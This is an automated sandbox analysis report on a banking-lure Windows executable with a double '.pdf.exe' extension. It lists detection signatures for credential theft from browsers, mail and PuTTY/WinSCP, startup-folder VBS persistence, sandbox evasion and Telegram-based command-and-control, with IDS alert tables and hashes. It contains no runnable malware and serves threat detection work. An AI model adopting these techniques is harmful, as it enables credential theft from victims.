Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BBVA-P53269 .pdf.exe

Overview

General Information

Sample name:BBVA-P53269 .pdf.exe
Analysis ID:1629827
MD5:344f646104b4b93a0e7244d2ef66c049
SHA1:b6fc87f66c8a38a196f690e5b148f05ff80a4392
SHA256:75b2472b562f8ae20e5ebc2f6c32a8a3eb1883b25c920000db1597ada8961076
Tags:BBVAexeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Generic Dropper
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BBVA-P53269 .pdf.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe" MD5: 344F646104B4B93A0E7244D2EF66C049)
    • InstallUtil.exe (PID: 6260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • AllData.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Roaming\AllData.exe" MD5: 344F646104B4B93A0E7244D2EF66C049)
      • InstallUtil.exe (PID: 5900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1333737955.0000000004281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x2c890:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x2d340:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000004.00000002.1338063941.00000000065F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Click to see the 8 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.BBVA-P53269 .pdf.exe.65f0000.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          4.2.BBVA-P53269 .pdf.exe.65f0000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Double Extension File Execution
            Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe", CommandLine: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, NewProcessName: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, OriginalFileName: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe", ProcessId: 7844, ProcessName: BBVA-P53269 .pdf.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , ProcessId: 6156, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , ProcessId: 6156, ProcessName: wscript.exe

            Data Obfuscation

            barindex
            Sigma detected: Drops script at startup location
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, ProcessId: 7844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-05T08:25:30.840126+010020453001A Network Trojan was detected192.168.2.1049915149.154.167.220443TCP
            2025-03-05T08:25:33.970320+010020453001A Network Trojan was detected192.168.2.1049936149.154.167.220443TCP
            2025-03-05T08:25:36.877956+010020453001A Network Trojan was detected192.168.2.1049954149.154.167.220443TCP
            2025-03-05T08:25:39.601927+010020453001A Network Trojan was detected192.168.2.1060372149.154.167.220443TCP
            2025-03-05T08:25:42.425456+010020453001A Network Trojan was detected192.168.2.1060379149.154.167.220443TCP
            2025-03-05T08:25:44.149425+010020453001A Network Trojan was detected192.168.2.1060380149.154.167.220443TCP
            2025-03-05T08:25:45.284831+010020453001A Network Trojan was detected192.168.2.1060381149.154.167.220443TCP
            2025-03-05T08:25:47.438418+010020453001A Network Trojan was detected192.168.2.1060382149.154.167.220443TCP
            2025-03-05T08:25:48.131831+010020453001A Network Trojan was detected192.168.2.1060383149.154.167.220443TCP
            2025-03-05T08:25:50.084821+010020453001A Network Trojan was detected192.168.2.1060384149.154.167.220443TCP
            2025-03-05T08:25:50.988586+010020453001A Network Trojan was detected192.168.2.1060385149.154.167.220443TCP
            2025-03-05T08:25:52.869681+010020453001A Network Trojan was detected192.168.2.1060386149.154.167.220443TCP
            2025-03-05T08:25:53.700437+010020453001A Network Trojan was detected192.168.2.1060387149.154.167.220443TCP
            2025-03-05T08:25:55.797146+010020453001A Network Trojan was detected192.168.2.1060388149.154.167.220443TCP
            2025-03-05T08:25:56.535814+010020453001A Network Trojan was detected192.168.2.1060389149.154.167.220443TCP
            2025-03-05T08:25:58.505820+010020453001A Network Trojan was detected192.168.2.1060390149.154.167.220443TCP
            2025-03-05T08:25:59.353673+010020453001A Network Trojan was detected192.168.2.1060391149.154.167.220443TCP
            2025-03-05T08:26:01.676070+010020453001A Network Trojan was detected192.168.2.1060392149.154.167.220443TCP
            2025-03-05T08:26:04.799938+010020453001A Network Trojan was detected192.168.2.1060394149.154.167.220443TCP
            2025-03-05T08:26:07.565475+010020453001A Network Trojan was detected192.168.2.1060395149.154.167.220443TCP
            2025-03-05T08:26:10.393413+010020453001A Network Trojan was detected192.168.2.1060396149.154.167.220443TCP
            2025-03-05T08:26:13.346945+010020453001A Network Trojan was detected192.168.2.1060397149.154.167.220443TCP
            2025-03-05T08:26:16.091981+010020453001A Network Trojan was detected192.168.2.1060398149.154.167.220443TCP
            2025-03-05T08:26:18.871758+010020453001A Network Trojan was detected192.168.2.1060399149.154.167.220443TCP
            2025-03-05T08:26:21.630878+010020453001A Network Trojan was detected192.168.2.1060400149.154.167.220443TCP
            2025-03-05T08:26:24.394359+010020453001A Network Trojan was detected192.168.2.1060401149.154.167.220443TCP
            2025-03-05T08:26:28.113963+010020453001A Network Trojan was detected192.168.2.1060402149.154.167.220443TCP
            2025-03-05T08:26:30.917432+010020453001A Network Trojan was detected192.168.2.1060403149.154.167.220443TCP
            2025-03-05T08:26:33.688565+010020453001A Network Trojan was detected192.168.2.1060404149.154.167.220443TCP
            2025-03-05T08:26:36.644631+010020453001A Network Trojan was detected192.168.2.1060405149.154.167.220443TCP
            2025-03-05T08:26:39.381563+010020453001A Network Trojan was detected192.168.2.1060406149.154.167.220443TCP
            2025-03-05T08:26:42.287182+010020453001A Network Trojan was detected192.168.2.1060407149.154.167.220443TCP
            2025-03-05T08:26:45.392387+010020453001A Network Trojan was detected192.168.2.1060408149.154.167.220443TCP
            2025-03-05T08:26:48.180106+010020453001A Network Trojan was detected192.168.2.1060409149.154.167.220443TCP
            2025-03-05T08:26:51.017953+010020453001A Network Trojan was detected192.168.2.1060410149.154.167.220443TCP
            2025-03-05T08:26:53.757031+010020453001A Network Trojan was detected192.168.2.1060411149.154.167.220443TCP
            2025-03-05T08:26:56.575909+010020453001A Network Trojan was detected192.168.2.1060412149.154.167.220443TCP
            2025-03-05T08:26:59.549994+010020453001A Network Trojan was detected192.168.2.1060413149.154.167.220443TCP
            2025-03-05T08:27:02.380186+010020453001A Network Trojan was detected192.168.2.1060414149.154.167.220443TCP
            2025-03-05T08:27:05.309985+010020453001A Network Trojan was detected192.168.2.1060415149.154.167.220443TCP
            2025-03-05T08:27:08.031260+010020453001A Network Trojan was detected192.168.2.1060416149.154.167.220443TCP
            2025-03-05T08:27:10.738487+010020453001A Network Trojan was detected192.168.2.1060417149.154.167.220443TCP
            2025-03-05T08:27:13.486158+010020453001A Network Trojan was detected192.168.2.1060418149.154.167.220443TCP
            2025-03-05T08:27:16.526580+010020453001A Network Trojan was detected192.168.2.1060419149.154.167.220443TCP
            2025-03-05T08:27:19.367141+010020453001A Network Trojan was detected192.168.2.1060420149.154.167.220443TCP
            2025-03-05T08:27:22.300104+010020453001A Network Trojan was detected192.168.2.1060421149.154.167.220443TCP
            2025-03-05T08:27:25.047884+010020453001A Network Trojan was detected192.168.2.1060422149.154.167.220443TCP
            2025-03-05T08:27:27.875373+010020453001A Network Trojan was detected192.168.2.1060423149.154.167.220443TCP
            2025-03-05T08:27:30.603857+010020453001A Network Trojan was detected192.168.2.1060424149.154.167.220443TCP
            2025-03-05T08:27:33.392668+010020453001A Network Trojan was detected192.168.2.1060425149.154.167.220443TCP
            2025-03-05T08:27:36.113810+010020453001A Network Trojan was detected192.168.2.1060426149.154.167.220443TCP
            2025-03-05T08:27:38.838762+010020453001A Network Trojan was detected192.168.2.1060427149.154.167.220443TCP
            2025-03-05T08:27:41.627330+010020453001A Network Trojan was detected192.168.2.1060428149.154.167.220443TCP
            2025-03-05T08:27:45.030303+010020453001A Network Trojan was detected192.168.2.1060429149.154.167.220443TCP
            2025-03-05T08:27:47.974857+010020453001A Network Trojan was detected192.168.2.1060430149.154.167.220443TCP
            2025-03-05T08:27:50.814915+010020453001A Network Trojan was detected192.168.2.1060431149.154.167.220443TCP
            2025-03-05T08:27:53.552738+010020453001A Network Trojan was detected192.168.2.1060432149.154.167.220443TCP
            2025-03-05T08:27:56.322572+010020453001A Network Trojan was detected192.168.2.1060433149.154.167.220443TCP
            2025-03-05T08:27:59.126360+010020453001A Network Trojan was detected192.168.2.1060434149.154.167.220443TCP
            2025-03-05T08:28:02.028220+010020453001A Network Trojan was detected192.168.2.1060435149.154.167.220443TCP
            2025-03-05T08:28:04.860491+010020453001A Network Trojan was detected192.168.2.1060436149.154.167.220443TCP
            2025-03-05T08:28:08.035006+010020453001A Network Trojan was detected192.168.2.1060437149.154.167.220443TCP
            2025-03-05T08:28:10.777581+010020453001A Network Trojan was detected192.168.2.1060438149.154.167.220443TCP
            2025-03-05T08:28:13.482504+010020453001A Network Trojan was detected192.168.2.1060439149.154.167.220443TCP
            2025-03-05T08:28:16.650598+010020453001A Network Trojan was detected192.168.2.1060440149.154.167.220443TCP
            2025-03-05T08:28:19.429003+010020453001A Network Trojan was detected192.168.2.1060441149.154.167.220443TCP
            2025-03-05T08:28:22.156413+010020453001A Network Trojan was detected192.168.2.1060442149.154.167.220443TCP
            2025-03-05T08:28:24.926145+010020453001A Network Trojan was detected192.168.2.1060443149.154.167.220443TCP
            2025-03-05T08:28:27.760280+010020453001A Network Trojan was detected192.168.2.1060444149.154.167.220443TCP
            2025-03-05T08:28:30.482132+010020453001A Network Trojan was detected192.168.2.1060445149.154.167.220443TCP
            2025-03-05T08:28:33.199358+010020453001A Network Trojan was detected192.168.2.1060446149.154.167.220443TCP
            2025-03-05T08:28:35.882991+010020453001A Network Trojan was detected192.168.2.1060447149.154.167.220443TCP
            2025-03-05T08:28:38.596035+010020453001A Network Trojan was detected192.168.2.1060448149.154.167.220443TCP
            2025-03-05T08:28:41.306479+010020453001A Network Trojan was detected192.168.2.1060449149.154.167.220443TCP
            2025-03-05T08:28:44.021549+010020453001A Network Trojan was detected192.168.2.1060450149.154.167.220443TCP
            2025-03-05T08:28:46.767279+010020453001A Network Trojan was detected192.168.2.1060451149.154.167.220443TCP
            2025-03-05T08:28:49.507935+010020453001A Network Trojan was detected192.168.2.1060452149.154.167.220443TCP
            2025-03-05T08:28:52.233428+010020453001A Network Trojan was detected192.168.2.1060453149.154.167.220443TCP
            2025-03-05T08:28:54.947408+010020453001A Network Trojan was detected192.168.2.1060454149.154.167.220443TCP
            2025-03-05T08:28:57.642350+010020453001A Network Trojan was detected192.168.2.1060455149.154.167.220443TCP
            2025-03-05T08:29:00.509370+010020453001A Network Trojan was detected192.168.2.1060456149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-05T08:24:59.060325+010028032742Potentially Bad Traffic192.168.2.1049716162.55.60.280TCP
            2025-03-05T08:25:11.579109+010028032742Potentially Bad Traffic192.168.2.1049793162.55.60.280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-05T08:25:30.291222+010028523881Malware Command and Control Activity Detected192.168.2.1049915149.154.167.220443TCP
            2025-03-05T08:25:33.451268+010028523881Malware Command and Control Activity Detected192.168.2.1049936149.154.167.220443TCP
            2025-03-05T08:25:36.205909+010028523881Malware Command and Control Activity Detected192.168.2.1049954149.154.167.220443TCP
            2025-03-05T08:25:39.094373+010028523881Malware Command and Control Activity Detected192.168.2.1060372149.154.167.220443TCP
            2025-03-05T08:25:41.807394+010028523881Malware Command and Control Activity Detected192.168.2.1060379149.154.167.220443TCP
            2025-03-05T08:25:42.664711+010028523881Malware Command and Control Activity Detected192.168.2.1060380149.154.167.220443TCP
            2025-03-05T08:25:44.793611+010028523881Malware Command and Control Activity Detected192.168.2.1060381149.154.167.220443TCP
            2025-03-05T08:25:46.796134+010028523881Malware Command and Control Activity Detected192.168.2.1060382149.154.167.220443TCP
            2025-03-05T08:25:47.501030+010028523881Malware Command and Control Activity Detected192.168.2.1060383149.154.167.220443TCP
            2025-03-05T08:25:49.660478+010028523881Malware Command and Control Activity Detected192.168.2.1060384149.154.167.220443TCP
            2025-03-05T08:25:50.352215+010028523881Malware Command and Control Activity Detected192.168.2.1060385149.154.167.220443TCP
            2025-03-05T08:25:52.316869+010028523881Malware Command and Control Activity Detected192.168.2.1060386149.154.167.220443TCP
            2025-03-05T08:25:53.209066+010028523881Malware Command and Control Activity Detected192.168.2.1060387149.154.167.220443TCP
            2025-03-05T08:25:55.157845+010028523881Malware Command and Control Activity Detected192.168.2.1060388149.154.167.220443TCP
            2025-03-05T08:25:56.048412+010028523881Malware Command and Control Activity Detected192.168.2.1060389149.154.167.220443TCP
            2025-03-05T08:25:58.028754+010028523881Malware Command and Control Activity Detected192.168.2.1060390149.154.167.220443TCP
            2025-03-05T08:25:58.826276+010028523881Malware Command and Control Activity Detected192.168.2.1060391149.154.167.220443TCP
            2025-03-05T08:26:01.097662+010028523881Malware Command and Control Activity Detected192.168.2.1060393149.154.167.220443TCP
            2025-03-05T08:26:01.097853+010028523881Malware Command and Control Activity Detected192.168.2.1060392149.154.167.220443TCP
            2025-03-05T08:26:04.179582+010028523881Malware Command and Control Activity Detected192.168.2.1060394149.154.167.220443TCP
            2025-03-05T08:26:07.080700+010028523881Malware Command and Control Activity Detected192.168.2.1060395149.154.167.220443TCP
            2025-03-05T08:26:09.885245+010028523881Malware Command and Control Activity Detected192.168.2.1060396149.154.167.220443TCP
            2025-03-05T08:26:12.853168+010028523881Malware Command and Control Activity Detected192.168.2.1060397149.154.167.220443TCP
            2025-03-05T08:26:15.572447+010028523881Malware Command and Control Activity Detected192.168.2.1060398149.154.167.220443TCP
            2025-03-05T08:26:18.354472+010028523881Malware Command and Control Activity Detected192.168.2.1060399149.154.167.220443TCP
            2025-03-05T08:26:21.145164+010028523881Malware Command and Control Activity Detected192.168.2.1060400149.154.167.220443TCP
            2025-03-05T08:26:23.880169+010028523881Malware Command and Control Activity Detected192.168.2.1060401149.154.167.220443TCP
            2025-03-05T08:26:27.297029+010028523881Malware Command and Control Activity Detected192.168.2.1060402149.154.167.220443TCP
            2025-03-05T08:26:30.365830+010028523881Malware Command and Control Activity Detected192.168.2.1060403149.154.167.220443TCP
            2025-03-05T08:26:33.151197+010028523881Malware Command and Control Activity Detected192.168.2.1060404149.154.167.220443TCP
            2025-03-05T08:26:36.032828+010028523881Malware Command and Control Activity Detected192.168.2.1060405149.154.167.220443TCP
            2025-03-05T08:26:38.877885+010028523881Malware Command and Control Activity Detected192.168.2.1060406149.154.167.220443TCP
            2025-03-05T08:26:41.670250+010028523881Malware Command and Control Activity Detected192.168.2.1060407149.154.167.220443TCP
            2025-03-05T08:26:44.870629+010028523881Malware Command and Control Activity Detected192.168.2.1060408149.154.167.220443TCP
            2025-03-05T08:26:47.636022+010028523881Malware Command and Control Activity Detected192.168.2.1060409149.154.167.220443TCP
            2025-03-05T08:26:50.520594+010028523881Malware Command and Control Activity Detected192.168.2.1060410149.154.167.220443TCP
            2025-03-05T08:26:53.242737+010028523881Malware Command and Control Activity Detected192.168.2.1060411149.154.167.220443TCP
            2025-03-05T08:26:56.014793+010028523881Malware Command and Control Activity Detected192.168.2.1060412149.154.167.220443TCP
            2025-03-05T08:26:58.999973+010028523881Malware Command and Control Activity Detected192.168.2.1060413149.154.167.220443TCP
            2025-03-05T08:27:01.859508+010028523881Malware Command and Control Activity Detected192.168.2.1060414149.154.167.220443TCP
            2025-03-05T08:27:04.797579+010028523881Malware Command and Control Activity Detected192.168.2.1060415149.154.167.220443TCP
            2025-03-05T08:27:07.536291+010028523881Malware Command and Control Activity Detected192.168.2.1060416149.154.167.220443TCP
            2025-03-05T08:27:10.243328+010028523881Malware Command and Control Activity Detected192.168.2.1060417149.154.167.220443TCP
            2025-03-05T08:27:12.985078+010028523881Malware Command and Control Activity Detected192.168.2.1060418149.154.167.220443TCP
            2025-03-05T08:27:15.971808+010028523881Malware Command and Control Activity Detected192.168.2.1060419149.154.167.220443TCP
            2025-03-05T08:27:18.828424+010028523881Malware Command and Control Activity Detected192.168.2.1060420149.154.167.220443TCP
            2025-03-05T08:27:21.785477+010028523881Malware Command and Control Activity Detected192.168.2.1060421149.154.167.220443TCP
            2025-03-05T08:27:24.516796+010028523881Malware Command and Control Activity Detected192.168.2.1060422149.154.167.220443TCP
            2025-03-05T08:27:27.263287+010028523881Malware Command and Control Activity Detected192.168.2.1060423149.154.167.220443TCP
            2025-03-05T08:27:30.098971+010028523881Malware Command and Control Activity Detected192.168.2.1060424149.154.167.220443TCP
            2025-03-05T08:27:32.837841+010028523881Malware Command and Control Activity Detected192.168.2.1060425149.154.167.220443TCP
            2025-03-05T08:27:35.622540+010028523881Malware Command and Control Activity Detected192.168.2.1060426149.154.167.220443TCP
            2025-03-05T08:27:38.330104+010028523881Malware Command and Control Activity Detected192.168.2.1060427149.154.167.220443TCP
            2025-03-05T08:27:41.081114+010028523881Malware Command and Control Activity Detected192.168.2.1060428149.154.167.220443TCP
            2025-03-05T08:27:44.517501+010028523881Malware Command and Control Activity Detected192.168.2.1060429149.154.167.220443TCP
            2025-03-05T08:27:47.461674+010028523881Malware Command and Control Activity Detected192.168.2.1060430149.154.167.220443TCP
            2025-03-05T08:27:50.355773+010028523881Malware Command and Control Activity Detected192.168.2.1060431149.154.167.220443TCP
            2025-03-05T08:27:53.057432+010028523881Malware Command and Control Activity Detected192.168.2.1060432149.154.167.220443TCP
            2025-03-05T08:27:55.831401+010028523881Malware Command and Control Activity Detected192.168.2.1060433149.154.167.220443TCP
            2025-03-05T08:27:58.577634+010028523881Malware Command and Control Activity Detected192.168.2.1060434149.154.167.220443TCP
            2025-03-05T08:28:01.365322+010028523881Malware Command and Control Activity Detected192.168.2.1060435149.154.167.220443TCP
            2025-03-05T08:28:04.321002+010028523881Malware Command and Control Activity Detected192.168.2.1060436149.154.167.220443TCP
            2025-03-05T08:28:07.525794+010028523881Malware Command and Control Activity Detected192.168.2.1060437149.154.167.220443TCP
            2025-03-05T08:28:10.263978+010028523881Malware Command and Control Activity Detected192.168.2.1060438149.154.167.220443TCP
            2025-03-05T08:28:12.981548+010028523881Malware Command and Control Activity Detected192.168.2.1060439149.154.167.220443TCP
            2025-03-05T08:28:16.159955+010028523881Malware Command and Control Activity Detected192.168.2.1060440149.154.167.220443TCP
            2025-03-05T08:28:18.911415+010028523881Malware Command and Control Activity Detected192.168.2.1060441149.154.167.220443TCP
            2025-03-05T08:28:21.634079+010028523881Malware Command and Control Activity Detected192.168.2.1060442149.154.167.220443TCP
            2025-03-05T08:28:24.407992+010028523881Malware Command and Control Activity Detected192.168.2.1060443149.154.167.220443TCP
            2025-03-05T08:28:27.169913+010028523881Malware Command and Control Activity Detected192.168.2.1060444149.154.167.220443TCP
            2025-03-05T08:28:29.955423+010028523881Malware Command and Control Activity Detected192.168.2.1060445149.154.167.220443TCP
            2025-03-05T08:28:32.724069+010028523881Malware Command and Control Activity Detected192.168.2.1060446149.154.167.220443TCP
            2025-03-05T08:28:35.393041+010028523881Malware Command and Control Activity Detected192.168.2.1060447149.154.167.220443TCP
            2025-03-05T08:28:38.107877+010028523881Malware Command and Control Activity Detected192.168.2.1060448149.154.167.220443TCP
            2025-03-05T08:28:40.820652+010028523881Malware Command and Control Activity Detected192.168.2.1060449149.154.167.220443TCP
            2025-03-05T08:28:43.522152+010028523881Malware Command and Control Activity Detected192.168.2.1060450149.154.167.220443TCP
            2025-03-05T08:28:46.258802+010028523881Malware Command and Control Activity Detected192.168.2.1060451149.154.167.220443TCP
            2025-03-05T08:28:49.013629+010028523881Malware Command and Control Activity Detected192.168.2.1060452149.154.167.220443TCP
            2025-03-05T08:28:51.714257+010028523881Malware Command and Control Activity Detected192.168.2.1060453149.154.167.220443TCP
            2025-03-05T08:28:54.459951+010028523881Malware Command and Control Activity Detected192.168.2.1060454149.154.167.220443TCP
            2025-03-05T08:28:57.189541+010028523881Malware Command and Control Activity Detected192.168.2.1060455149.154.167.220443TCP
            2025-03-05T08:28:59.961048+010028523881Malware Command and Control Activity Detected192.168.2.1060456149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-05T08:25:30.291222+010018100081Potentially Bad Traffic192.168.2.1049915149.154.167.220443TCP
            2025-03-05T08:25:33.451268+010018100081Potentially Bad Traffic192.168.2.1049936149.154.167.220443TCP
            2025-03-05T08:25:36.205909+010018100081Potentially Bad Traffic192.168.2.1049954149.154.167.220443TCP
            2025-03-05T08:25:39.094373+010018100081Potentially Bad Traffic192.168.2.1060372149.154.167.220443TCP
            2025-03-05T08:25:41.807394+010018100081Potentially Bad Traffic192.168.2.1060379149.154.167.220443TCP
            2025-03-05T08:25:42.664711+010018100081Potentially Bad Traffic192.168.2.1060380149.154.167.220443TCP
            2025-03-05T08:25:44.793611+010018100081Potentially Bad Traffic192.168.2.1060381149.154.167.220443TCP
            2025-03-05T08:25:46.796134+010018100081Potentially Bad Traffic192.168.2.1060382149.154.167.220443TCP
            2025-03-05T08:25:47.501030+010018100081Potentially Bad Traffic192.168.2.1060383149.154.167.220443TCP
            2025-03-05T08:25:49.660478+010018100081Potentially Bad Traffic192.168.2.1060384149.154.167.220443TCP
            2025-03-05T08:25:50.352215+010018100081Potentially Bad Traffic192.168.2.1060385149.154.167.220443TCP
            2025-03-05T08:25:52.316869+010018100081Potentially Bad Traffic192.168.2.1060386149.154.167.220443TCP
            2025-03-05T08:25:53.209066+010018100081Potentially Bad Traffic192.168.2.1060387149.154.167.220443TCP
            2025-03-05T08:25:55.157845+010018100081Potentially Bad Traffic192.168.2.1060388149.154.167.220443TCP
            2025-03-05T08:25:56.048412+010018100081Potentially Bad Traffic192.168.2.1060389149.154.167.220443TCP
            2025-03-05T08:25:58.028754+010018100081Potentially Bad Traffic192.168.2.1060390149.154.167.220443TCP
            2025-03-05T08:25:58.826276+010018100081Potentially Bad Traffic192.168.2.1060391149.154.167.220443TCP
            2025-03-05T08:26:01.097662+010018100081Potentially Bad Traffic192.168.2.1060393149.154.167.220443TCP
            2025-03-05T08:26:01.097853+010018100081Potentially Bad Traffic192.168.2.1060392149.154.167.220443TCP
            2025-03-05T08:26:04.179582+010018100081Potentially Bad Traffic192.168.2.1060394149.154.167.220443TCP
            2025-03-05T08:26:07.080700+010018100081Potentially Bad Traffic192.168.2.1060395149.154.167.220443TCP
            2025-03-05T08:26:09.885245+010018100081Potentially Bad Traffic192.168.2.1060396149.154.167.220443TCP
            2025-03-05T08:26:12.853168+010018100081Potentially Bad Traffic192.168.2.1060397149.154.167.220443TCP
            2025-03-05T08:26:15.572447+010018100081Potentially Bad Traffic192.168.2.1060398149.154.167.220443TCP
            2025-03-05T08:26:18.354472+010018100081Potentially Bad Traffic192.168.2.1060399149.154.167.220443TCP
            2025-03-05T08:26:21.145164+010018100081Potentially Bad Traffic192.168.2.1060400149.154.167.220443TCP
            2025-03-05T08:26:23.880169+010018100081Potentially Bad Traffic192.168.2.1060401149.154.167.220443TCP
            2025-03-05T08:26:27.297029+010018100081Potentially Bad Traffic192.168.2.1060402149.154.167.220443TCP
            2025-03-05T08:26:30.365830+010018100081Potentially Bad Traffic192.168.2.1060403149.154.167.220443TCP
            2025-03-05T08:26:33.151197+010018100081Potentially Bad Traffic192.168.2.1060404149.154.167.220443TCP
            2025-03-05T08:26:36.032828+010018100081Potentially Bad Traffic192.168.2.1060405149.154.167.220443TCP
            2025-03-05T08:26:38.877885+010018100081Potentially Bad Traffic192.168.2.1060406149.154.167.220443TCP
            2025-03-05T08:26:41.670250+010018100081Potentially Bad Traffic192.168.2.1060407149.154.167.220443TCP
            2025-03-05T08:26:44.870629+010018100081Potentially Bad Traffic192.168.2.1060408149.154.167.220443TCP
            2025-03-05T08:26:47.636022+010018100081Potentially Bad Traffic192.168.2.1060409149.154.167.220443TCP
            2025-03-05T08:26:50.520594+010018100081Potentially Bad Traffic192.168.2.1060410149.154.167.220443TCP
            2025-03-05T08:26:53.242737+010018100081Potentially Bad Traffic192.168.2.1060411149.154.167.220443TCP
            2025-03-05T08:26:56.014793+010018100081Potentially Bad Traffic192.168.2.1060412149.154.167.220443TCP
            2025-03-05T08:26:58.999973+010018100081Potentially Bad Traffic192.168.2.1060413149.154.167.220443TCP
